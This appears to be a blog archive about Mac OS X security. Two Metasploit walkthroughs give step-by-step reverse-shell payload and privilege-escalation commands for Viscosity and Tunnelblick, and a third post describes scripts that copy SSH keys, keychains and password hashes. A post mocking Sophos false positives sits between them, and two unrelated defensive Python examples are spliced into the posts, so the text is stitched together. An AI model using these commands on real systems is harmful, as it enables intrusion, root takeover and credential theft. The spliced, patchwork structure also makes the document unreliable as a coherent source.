CVE-2012-4284 Setuid Viscosity Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld on 2012-08-11
Vulnerability corrected by the vendor on 2012-08-30
Metasploit PoC provided on 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-4284
OSVDB-84709

Affected version(s) :

Viscosity 1.4.1 and earlier

Tested on Mac OS X 10.7.5 x64 with :

Viscosity 1.4.1

Description :

This module exploits a vulnerability in Viscosity 1.4.1 on Mac OS X. The vulnerability exists in the setuid ViscosityHelper, where insufficient validation of path names allows execution of arbitrary Python code as root. This module has been tested successfully on Viscosity 1.4.1 on Mac OS X 10.7.5.

Commands :

Create an OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload to the victim OS X 10.7.5 machine

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload; a session will be created.
This session runs with the current user's privileges.

use exploit/osx/local/setuid_viscosity
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

CVE-2012-3485 Setuid Tunnelblick Privilege Escalation Metasploit Demo

Timeline :

Vulnerability discovered and reported to the vendor by Jason A. Donenfeld on 2012-08-11
Metasploit PoC provided on 2013-03-03

PoC provided by :

Jason A. Donenfeld
juan vazquez

Reference(s) :

CVE-2012-3485

Affected version(s) :

Tunnelblick 3.2.8 and earlier

Tested on Mac OS X 10.7.5 x64 with :

Tunnelblick 3.2.8

Description :

This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The vulnerability exists in the setuid openvpnstart, where insufficient validation of path names allows execution of arbitrary shell scripts as root. This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099 on Mac OS X 10.7.5.
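Both descriptions above share one root cause: a setuid helper hands a caller-supplied path to an interpreter without checking where that path really leads. The following added example (not the Viscosity, Tunnelblick or Metasploit code) shows in Python the validation such a helper should perform: canonicalise the path, confine it to one directory, and require every component on the way to be owner-locked. `trusted_script_path`, `run_demo` and the temporary-directory layout are constructed for this illustration.

```python
import os
import stat
import tempfile


def trusted_script_path(path, allowed_dir, owner_uid=0):
    """Return the canonical path if it may be run with elevated privileges,
    else None. allowed_dir is the only directory scripts may come from;
    owner_uid is the uid every component must have (0 in a real setuid
    helper; the demo passes the current uid so it runs unprivileged)."""
    real_dir = os.path.realpath(allowed_dir)
    real = os.path.realpath(path)          # resolve symlinks and ".." first
    if not real.startswith(real_dir + os.sep):
        return None                        # escaped the allowed directory
    writable_by_others = stat.S_IWGRP | stat.S_IWOTH
    parts = os.path.relpath(real, real_dir).split(os.sep)
    for depth in range(len(parts) + 1):    # check allowed_dir, then each child
        node = os.path.join(real_dir, *parts[:depth])
        try:
            st = os.stat(node)
        except OSError:
            return None                    # missing component: refuse
        # A foreign-owned or group/world-writable component lets a local
        # user swap in their own script, so the whole chain must be locked.
        if st.st_uid != owner_uid or st.st_mode & writable_by_others:
            return None
    return real if stat.S_ISREG(st.st_mode) else None


def run_demo():
    """Constructed layout: a legitimate script, a loose-permission script,
    a symlink pointing outside, and a '..' traversal. Returns the verdicts."""
    base = tempfile.mkdtemp()              # hypothetical helper script root
    me = os.getuid()
    scripts = os.path.join(base, "scripts")
    os.mkdir(scripts, 0o755)
    good = os.path.join(scripts, "up.sh")
    with open(good, "w") as f:
        f.write("#!/bin/sh\necho ok\n")
    os.chmod(good, 0o755)
    loose = os.path.join(scripts, "loose.sh")
    open(loose, "w").close()
    os.chmod(loose, 0o777)                 # anyone could rewrite this one
    outside = os.path.join(base, "evil.sh")
    open(outside, "w").close()
    os.symlink(outside, os.path.join(scripts, "link.sh"))
    return {
        "good": trusted_script_path(good, scripts, me) == os.path.realpath(good),
        "dotdot": trusted_script_path(os.path.join(scripts, "..", "evil.sh"), scripts, me) is None,
        "symlink": trusted_script_path(os.path.join(scripts, "link.sh"), scripts, me) is None,
        "writable": trusted_script_path(loose, scripts, me) is None,
    }
```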

Commands :

Create an OS X x86 payload with msfpayload
msfpayload osx/x86/shell_reverse_tcp LHOST=192.168.178.26 X > osx-payload

Upload this payload to the victim OS X 10.7.5 machine

use exploit/multi/handler
set PAYLOAD osx/x86/shell_reverse_tcp
set LHOST 192.168.178.26
exploit -j

Execute osx-payload; a session will be created.
This session runs with the current user's privileges.

use exploit/osx/local/setuid_tunnelblick
set SESSION 1
set PAYLOAD osx/x86/shell_reverse_tcp
set LPORT 4445
set LHOST 192.168.178.26
exploit

id

10 of 10 malware detections by Sophos Anti-Virus for Mac are false positives. Are yours?

On April 24, the Sophos Naked Security blog published a post regarding malware infections on Mac OS X. Sophos claimed that 20% of Mac computers were carrying one or more instances of Windows malware. All this malware was detected through their free Sophos Anti-Virus for Mac Home Edition.

The Flashback malware was the big story of April for Mac consumers, and every anti-virus company jumped on this opportunity to promote its products and spread propaganda about Mac OS X security. I agree with them that Mac OS X is a product like any other and that it also has to be protected against threats, but the proposed solutions are worse than doing nothing.


During my tests of Sophos Anti-Virus for Mac Home Edition, 10 of 10 malware detections raised by the anti-virus were false positives, harassing me with constant alert pop-ups during regular operations, Spotlight indexing and Time Machine backups. Below is a sample of 10 infections detected by Sophos Anti-Virus for Mac.

Perl/FtpExp-A

False positives due to the binary format of the "affected" files.

/Users/xxxx/Library/Saved Application State/com.twitter.twitter-mac.savedState/window_1.data
/Users/xxxx/Library/Preferences/Macromedia/Flash Player/macromedia.com/support/flashplayer/sys/#s.ytimg.com/settings.sol

Troj/BredoZp-JO

Sophos itself is a trojan, some iTunes applications and Chrome are backdoored, and nobody knew about it.

/Library/Preferences/com.sophos.sav.plist
/Users/xxxx/Music/iTunes/iTunes Media/Mobile Applications/iSSH 5.3.1.ipa
/Users/xxxx/Library/Saved Application State/com.google.Chrome.savedState/windows.plist

Troj/BredoZp-JN

iTunes is very well-known backdoored software, and once more Sophos itself contains a trojan.

/Users/xxxx/Library/Caches/com.apple.iTunes/goog-phish-shavar.db
/Library/Preferences/com.sophos.sav.plist

Troj/Iframe-HY

Once more Sophos is a trojan, and now my Spotlight index files also contain a backdoor.

/Library/Preferences/com.sophos.sav.plist
/Volumes/xxxx/.Spotlight-V100/Store-V2/700BF07C-170F-482E-A2BB-45EF8501935C/0.indexPostings

Mal/IRCBot-O

VLC contains an IRC bot: gotcha, remote control of all VLC users.

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Troj/PhpShell-Z

Once more VLC, which now contains a PHP trojan …

/Applications/VLC.app/Contents/Resources/English.lproj/InfoPlist.strings

Mal/PHPShell-A

Everybody knows that Sophos Anti-Virus products are developed in PHP.

/Library/Preferences/com.sophos.sav.plist

Troj/PDFJs-B

Help, my logs contain trojans, and Sophos once more.

/private/var/log/DiagnosticMessages/2012.05.05.asl
/Library/Preferences/com.sophos.sav.plist

Mal/Badsrc-C

My Spotlight index has a dead malware…

/.Spotlight-V100/Store-V2/DeadFiles/orphan.ef786332/0000/0000/0151/22087716.txt

Troj/PhoexRef-A

Huh, my Metasploit screenshots contain trojans (why not, lol) and Google Drive is backdoored.

/Users/xxxx/Desktop/screenshots/metasploit-vmware-modules-research.png
/Users/xxxx/Library/Application Support/Google/Drive/sync_config.db
/usr/share/zoneinfo/UTC
/Library/Preferences/com.sophos.sav.plist

In conclusion, Sophos is better at doing marketing and scaring consumers than at creating a good Mac anti-virus that really detects something.

Metasploit Mac OS X Post Exploitation : Enumeration and Hash Dump

As always, Carlos Perez aka Dark Operator, member of the PaulDotCom crew and Metasploit developer, is inspired. A new set of post-exploitation scripts has been developed and integrated into the Metasploit Framework repository. These scripts let you gather interesting information on a Mac OS X target.

These Metasploit post-exploitation scripts support versions 10.3, 10.4, 10.5, 10.6 and 10.7 of Mac OS X. For the moment they only work with a "shell" payload, but Carlos is working on a version that supports complete integration with Meterpreter. Carlos is also working on an iOS integration.

Mac OS X enum_osx post exploitation script

This script lets you gather the available data types by automating the execution of the "/usr/sbin/system_profiler" command. Depending on your Mac OS X version, more or fewer data types will be available. Below are some examples :

  • SPSoftwareDataType : Everything related to the system software (system version, kernel version, boot volume, boot mode, computer name, user name, time since boot and whether secure virtual memory is enabled).
  • SPNetworkDataType : Everything related to the network configurations (IPs, networks, gateways, configuration methods, proxies, MAC addresses, etc.).
  • SPBluetoothDataType : All information related to the Bluetooth configuration (shared folders, authentication requirements, etc.).
  • SPEthernetDataType : All information related to Ethernet cards (bus, vendor and device ID, vendor and device subsystem ID, revision ID, BSD name, kext name, location and version).
  • SPAirPortDataType : All information related to the AirPort configuration (model, firmware version, current wireless network and channel).
  • SPNetworkLocationDataType : More detailed information on the network configurations.
  • SPUSBDataType : All information on the USB bus and connected devices.
  • SPPrintersDataType : All information on locally or remotely configured printers.
  • SPFirewallDataType : All information related to the local firewall (firewall mode, authorized applications, logging mode and stealth mode).
  • SPApplicationsDataType : All information on all installed software (version, last modification date, location, etc.).
  • SPDeveloperToolsDataType : All information on the installed development tools.
  • SPFrameworksDataType : All information on the Apple frameworks (version, last modification date, location, etc.).
  • SPStartupItemDataType : All information on the start-up items (description, location, requirements, start-up order preferences).
  • SPPrefPaneDataType : All information related to the preference panes (version, visible or not, identifier and location).
  • SPLogsDataType : All non-rotated log files and their recent contents.

Some other commands are also executed to gather more information :

  • Current TCP connections (netstat -np tcp).
  • Current UDP connections (netstat -np udp).
  • Environment variables (printenv).
  • Last boot time (who -b).
  • Current activity (who).
  • Process list (ps -ea).
  • List of all users (dscacheutil -q user).
  • List of all groups (dscacheutil -q group).
  • Download the contents of the "$HOME/.ssh/" folder.
  • Download the contents of the "$HOME/.gnupg/" folder.
  • Download the "$HOME/*_history" files.
  • Download the users' configured keychains listed by the "/usr/bin/security list-keychains" command.
  • Extract and download history files.
  • Take a screenshot of the current session in JPEG format.

As for the hashdump script, if the Metasploit session is running with Mac OS X root privileges, the SHA, LM and/or NTLM password hashes of the user accounts will be downloaded.
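From the defender's side, the command burst listed above is itself a usable detection signature. The following is an added example, not part of Carlos Perez's scripts: a Python check over constructed process-execution log lines (the "epoch user pid command" format is assumed, as is the `find_enum_bursts` helper) that flags any user running several distinct enum_osx commands within a short time window.

```python
import re

# Commands the post says enum_osx runs, as regexes over the command line.
ENUM_SIGNATURES = {
    "system_profiler": r"^/usr/sbin/system_profiler\b",
    "netstat": r"^netstat -np (tcp|udp)\b",
    "printenv": r"^printenv\b",
    "who": r"^who\b",
    "ps": r"^ps -ea\b",
    "dscacheutil": r"^dscacheutil -q (user|group)\b",
    "keychains": r"^/usr/bin/security list-keychains\b",
}

# Constructed sample log: "<epoch> <user> <pid> <command line>" per line.
SAMPLE_LOG = """\
1336219200 bob 5120 /usr/sbin/system_profiler SPSoftwareDataType
1336219201 bob 5121 /usr/sbin/system_profiler SPNetworkDataType
1336219202 bob 5122 netstat -np tcp
1336219202 bob 5123 netstat -np udp
1336219203 bob 5124 printenv
1336219203 bob 5125 who -b
1336219204 bob 5126 ps -ea
1336219205 bob 5127 dscacheutil -q user
1336219205 bob 5128 dscacheutil -q group
1336219206 bob 5129 /usr/bin/security list-keychains
1336219900 alice 6001 /usr/sbin/system_profiler SPUSBDataType
1336220500 alice 6002 who
"""


def classify(cmdline):
    """Return the signature name a command line matches, or None."""
    for name, pattern in ENUM_SIGNATURES.items():
        if re.match(pattern, cmdline):
            return name
    return None


def find_enum_bursts(log_text, window=60, min_distinct=5):
    """Return {user: sorted signature names} for each user who ran at least
    min_distinct different enumeration commands within `window` seconds.
    Isolated admin use of one or two of these tools is deliberately ignored."""
    events = {}                                  # user -> [(timestamp, sig)]
    for line in log_text.splitlines():
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue                             # skip malformed lines
        ts, user, _pid, cmd = parts
        sig = classify(cmd)
        if sig:
            events.setdefault(user, []).append((int(ts), sig))
    flagged = {}
    for user, evs in sorted(events.items()):
        evs.sort()
        hits = set()
        for i, (start, _) in enumerate(evs):     # sliding window from each event
            seen = {s for t, s in evs[i:] if t - start <= window}
            if len(seen) >= min_distinct:
                hits |= seen
        if hits:
            flagged[user] = sorted(hits)
    return flagged
```

Running `find_enum_bursts(SAMPLE_LOG)` flags only bob, whose ten commands span six seconds; alice's two commands ten minutes apart stay below the threshold.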

All gathered information is saved into a "logs/post/enum_osx/hostname-date" folder located in your "$HOME/.msf3" folder.

Metasploit enum_osx post exploitation

Mac OS X hashdump post exploitation script

As described above, this script focuses only on gathering the Mac OS X user accounts' SHA, LM and/or NTLM password hash dumps and downloading everything to the Metasploit station. All gathered information is saved into a "logs/post/enum_osx/hostname-date" folder located in your "$HOME/.msf3" folder.

Metasploit OS X hashdump post exploitation

To test these scripts you only need to create an executable payload for Mac OS X and follow these steps.

First create the payload with msfpayload and upload it to the targeted Mac OS X.

sudo msfpayload osx/ppc/shell_reverse_tcp LHOST=192.168.178.21 LPORT=4444 X > test

Then in msfconsole, run the following commands.

use exploit/multi/handler
set PAYLOAD osx/ppc/shell_reverse_tcp
set LHOST 192.168.178.21
exploit -j

Then, on the targeted Mac OS X, execute the test payload.

Or you could use a working Mac OS X system or application exploit. Below is a PoC video.